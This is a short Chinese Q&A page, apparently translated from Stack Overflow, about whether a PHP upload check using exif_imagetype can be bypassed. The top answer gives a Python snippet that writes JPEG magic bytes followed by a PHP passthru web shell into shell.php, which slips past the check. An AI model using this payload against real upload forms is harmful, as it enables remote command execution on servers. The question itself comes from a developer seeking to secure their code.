我读到 exif_imagetype 是一个安全函数,可以避免上传 php 或其他 shell 代码而不是图像文件。最近看了另一篇文章,我们可以通过一些简单的方法绕过这个安全功能。因此,如果有人知道绕过的确切方法,您能否分享您的答案。
我在我的 php 脚本中使用了以下代码,所以我想知道它是否存在漏洞并针对相同的问题进行补救
if (! exif_imagetype($_FILES['upload']['tmp_name']))
{
echo "File is not an image";
}
最佳答案
根据@jake_the_snake 先生的回答,我还会在 Python 中包含一个快速代码示例
>>> fh = open('shell.php', 'w')
>>> fh.write('\xFF\xD8\xFF\xE0' + '<? passthru($_GET["cmd"]); ?>')
>>> fh.close()
关于php - 如何绕过exif_imagetype函数上传php代码?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/18357095/